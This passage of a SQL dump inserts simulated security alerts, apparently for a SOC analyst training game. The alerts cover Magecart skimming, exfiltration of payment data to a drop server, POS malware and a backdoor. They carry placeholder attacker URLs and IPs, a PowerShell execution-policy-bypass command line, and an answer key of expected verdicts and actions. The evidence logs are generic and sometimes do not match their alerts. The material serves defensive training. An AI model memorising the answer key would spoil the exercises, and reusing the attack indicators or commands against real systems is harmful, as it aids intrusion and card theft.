count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:32Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"host\\\":\\\"dc01.corp.local\\\",\\\"user\\\":\\\"Administrator\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.1.1.5\\\",\\\"service_name\\\":\\\"WinSvcHelper\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svcbackdoor.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"event_description\\\":\\\"Service creation detected. The service \'WinSvcHelper\' was created and linked to a malicious executable.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.064Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:32Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"host\\\":\\\"dc01.corp.local\\\",\\\"user\\\":\\\"Administrator\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.1.1.5\\\",\\\"service_name\\\":\\\"WinSvcHelper\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svcbackdoor.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"event_description\\\":\\\"Service creation detected. The service \'WinSvcHelper\' was created and linked to a malicious executable.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.064Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:32Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"host\\\":\\\"dc01.corp.local\\\",\\\"user\\\":\\\"Administrator\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.1.1.5\\\",\\\"service_name\\\":\\\"WinSvcHelper\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svcbackdoor.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"event_description\\\":\\\"Service creation detected. The service \'WinSvcHelper\' was created and linked to a malicious executable.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.064Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:32Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"host\\\":\\\"dc01.corp.local\\\",\\\"user\\\":\\\"Administrator\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.1.1.5\\\",\\\"service_name\\\":\\\"WinSvcHelper\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svcbackdoor.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"event_description\\\":\\\"Service creation detected. The service \'WinSvcHelper\' was created and linked to a malicious executable.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(455, 'Initial Compromise via Third-Party Library', 'high', 'Web Application Firewall (WAF) Logs', 'An intrusion was detected via a compromised third-party advertising library. The library, affected by Magecart, injects malicious JavaScript into checkout pages to exfiltrate sensitive information.', 'Supply Chain Attack', 'T1195.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"http_request\":\"GET /ad-library.js HTTP/1.1\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\",\"referrer\":\"https://example-store.com/checkout\",\"malicious_script_hash\":\"6f1e3b2b4c3e8a2f7f5d5c9b8a8f7d6e\",\"filename\":\"ad-library.js\",\"detected_by\":\"WAF\",\"alert_id\":\"waf-alert-20231015-0001\"}', '2026-01-05 00:07:01', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Threat Intel\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous Magecart attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"6f1e3b2b4c3e8a2f7f5d5c9b8a8f7d6e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Magecart-injected scripts.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"ad-library.js\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Inventory\",\"verdict\":\"internal\",\"details\":\"Filename is part of third-party library.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(456, 'Execution of Obfuscated JavaScript', 'high', 'JavaScript Console Logs', 'Obfuscated JavaScript code executed on the checkout page to skim credit card details and transmit them to an attacker-controlled server.', 'Code Injection', 'T1059.007', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:54Z\",\"event_id\":\"js_exec_001\",\"script_url\":\"http://malicious-domain.com/skimmer.js\",\"executed_by_ip\":\"192.168.1.101\",\"exfiltration_url\":\"http://attacker-site.com/cc_capture\",\"attacker_ip\":\"203.0.113.45\",\"script_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\",\"filename\":\"skimmer.js\"}', '2026-01-05 00:07:01', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://malicious-domain.com/skimmer.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with known credit card skimming attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel\",\"verdict\":\"malicious\",\"details\":\"IP address known for hosting malicious infrastructure.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash associated with obfuscated JavaScript malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.066Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:54Z\\\",\\\"event_id\\\":\\\"js_exec_001\\\",\\\"script_url\\\":\\\"http://malicious-domain.com/skimmer.js\\\",\\\"executed_by_ip\\\":\\\"192.168.1.101\\\",\\\"exfiltration_url\\\":\\\"http://attacker-site.com/cc_capture\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"script_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\\\",\\\"filename\\\":\\\"skimmer.js\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.066Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:54Z\\\",\\\"event_id\\\":\\\"js_exec_001\\\",\\\"script_url\\\":\\\"http://malicious-domain.com/skimmer.js\\\",\\\"executed_by_ip\\\":\\\"192.168.1.101\\\",\\\"exfiltration_url\\\":\\\"http://attacker-site.com/cc_capture\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"script_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\\\",\\\"filename\\\":\\\"skimmer.js\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.066Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:54Z\\\",\\\"event_id\\\":\\\"js_exec_001\\\",\\\"script_url\\\":\\\"http://malicious-domain.com/skimmer.js\\\",\\\"executed_by_ip\\\":\\\"192.168.1.101\\\",\\\"exfiltration_url\\\":\\\"http://attacker-site.com/cc_capture\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"script_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\\\",\\\"filename\\\":\\\"skimmer.js\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.066Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:54Z\\\",\\\"event_id\\\":\\\"js_exec_001\\\",\\\"script_url\\\":\\\"http://malicious-domain.com/skimmer.js\\\",\\\"executed_by_ip\\\":\\\"192.168.1.101\\\",\\\"exfiltration_url\\\":\\\"http://attacker-site.com/cc_capture\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"script_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\\\",\\\"filename\\\":\\\"skimmer.js\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.066Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:54Z\\\",\\\"event_id\\\":\\\"js_exec_001\\\",\\\"script_url\\\":\\\"http://malicious-domain.com/skimmer.js\\\",\\\"executed_by_ip\\\":\\\"192.168.1.101\\\",\\\"exfiltration_url\\\":\\\"http://attacker-site.com/cc_capture\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"script_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\\\",\\\"filename\\\":\\\"skimmer.js\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(457, 'Data Exfiltration to Drop Server', 'high', 'Network Traffic Analysis', 'The network traffic analysis has detected an unauthorized data transfer from the compromised internal server to an external drop server associated with Magecart. The data transferred includes payment information extracted from the internal server. The traffic was observed from internal IP 192.168.10.15 to external IP 203.0.113.45, with the data being exported in a compressed file named \'payments_exfil.zip\'. The hash of the exfiltrated file is 9e107d9d372bb6826bd81d3542a419d6.', 'Data Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"source_ip\":\"192.168.10.15\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"file_name\":\"payments_exfil.zip\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\",\"user\":\"websrv_user\",\"action\":\"transfer\",\"status\":\"completed\"}', '2026-01-05 00:07:01', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"External IP associated with Magecart drop servers.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"payments_exfil.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename used for exfiltrated payment data.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known exfiltrated data files.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(458, 'Suspicious Vendor Login Detected', 'high', 'SIEM Logs', 'An unauthorized login attempt was detected using compromised credentials from a trusted vendor. The attacker used these credentials to gain initial access to the retail giant\'s POS network.', 'Initial Access', 'T1078.001 - Valid Accounts: Default Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:20:30Z\",\"event_id\":\"4567\",\"event_type\":\"login_attempt\",\"username\":\"vendor_john_doe\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"login_status\":\"success\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\",\"network_domain\":\"pos_network\",\"hash\":\"3b3e8f557c3c4e3b2e8e9f0b8b4e9f5d\",\"file_name\":\"pos_access_script.exe\"}', '2026-01-05 00:10:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"vendor_john_doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"The username is associated with a trusted vendor but was used from an unusual location.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"The IP address is linked to multiple unauthorized access attempts.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b3e8f557c3c4e3b2e8e9f0b8b4e9f5d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"The hash corresponds to a known malware used in recent attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"pos_access_script.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"The filename is consistent with scripts used in previous breaches.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.068Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:20:30Z\\\",\\\"event_id\\\":\\\"4567\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"username\\\":\\\"vendor_john_doe\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"login_status\\\":\\\"success\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"network_domain\\\":\\\"pos_network\\\",\\\"hash\\\":\\\"3b3e8f557c3c4e3b2e8e9f0b8b4e9f5d\\\",\\\"file_name\\\":\\\"pos_access_script.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.068Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:20:30Z\\\",\\\"event_id\\\":\\\"4567\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"username\\\":\\\"vendor_john_doe\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"login_status\\\":\\\"success\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"network_domain\\\":\\\"pos_network\\\",\\\"hash\\\":\\\"3b3e8f557c3c4e3b2e8e9f0b8b4e9f5d\\\",\\\"file_name\\\":\\\"pos_access_script.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.068Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:20:30Z\\\",\\\"event_id\\\":\\\"4567\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"username\\\":\\\"vendor_john_doe\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"login_status\\\":\\\"success\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"network_domain\\\":\\\"pos_network\\\",\\\"hash\\\":\\\"3b3e8f557c3c4e3b2e8e9f0b8b4e9f5d\\\",\\\"file_name\\\":\\\"pos_access_script.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.068Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:20:30Z\\\",\\\"event_id\\\":\\\"4567\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"username\\\":\\\"vendor_john_doe\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"login_status\\\":\\\"success\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"network_domain\\\":\\\"pos_network\\\",\\\"hash\\\":\\\"3b3e8f557c3c4e3b2e8e9f0b8b4e9f5d\\\",\\\"file_name\\\":\\\"pos_access_script.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.068Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:20:30Z\\\",\\\"event_id\\\":\\\"4567\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"username\\\":\\\"vendor_john_doe\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"login_status\\\":\\\"success\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"network_domain\\\":\\\"pos_network\\\",\\\"hash\\\":\\\"3b3e8f557c3c4e3b2e8e9f0b8b4e9f5d\\\",\\\"file_name\\\":\\\"pos_access_script.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(459, 'Trinity Malware Deployment on POS Systems', 'high', 'Endpoint Detection and Response (EDR)', 'FIN6 has deployed Trinity malware on several Point-of-Sale (POS) systems, targeting RAM to scrape unencrypted credit card data.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T14:22:45Z\",\"event_id\":\"4624\",\"computer_name\":\"POS-Server-22\",\"user\":\"svc-posadmin\",\"source_ip\":\"185.23.45.67\",\"internal_ip\":\"192.168.1.105\",\"process_name\":\"powershell.exe\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\pos_trinity.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"event_description\":\"Execution of suspicious binary linked to Trinity malware on POS system.\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Windows\\\\System32\\\\pos_trinity.exe\"}', '2026-01-05 00:10:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.23.45.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known FIN6 command and control servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local POS system IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Trinity malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"pos_trinity.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Filename identified as Trinity malware targeting POS systems.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"svc-posadmin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Service account used in anomalous execution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(460, 'Establishing Persistent Access', 'high', 'Network Traffic Analysis', 'The attacker has set up a persistent backdoor on the POS network, ensuring they can regain access even if initial malware installations are removed. Network traffic analysis revealed unauthorized communication from an internal host to a known malicious IP, indicating the presence of a backdoor.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"192.168.1.45\",\"dest_ip\":\"203.0.113.25\",\"protocol\":\"TCP\",\"port\":\"4444\",\"action\":\"allowed\",\"user\":\"john_doe\",\"process_name\":\"backdoor_service.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"malware_family\":\"APT_Backdoor\",\"event_id\":\"1002\",\"message\":\"Outbound connection to known malicious IP detected from internal host.\"}', '2026-01-05 00:10:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT_Backdoor malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor_service.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"File used to establish persistent access by creating unauthorized external connections.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
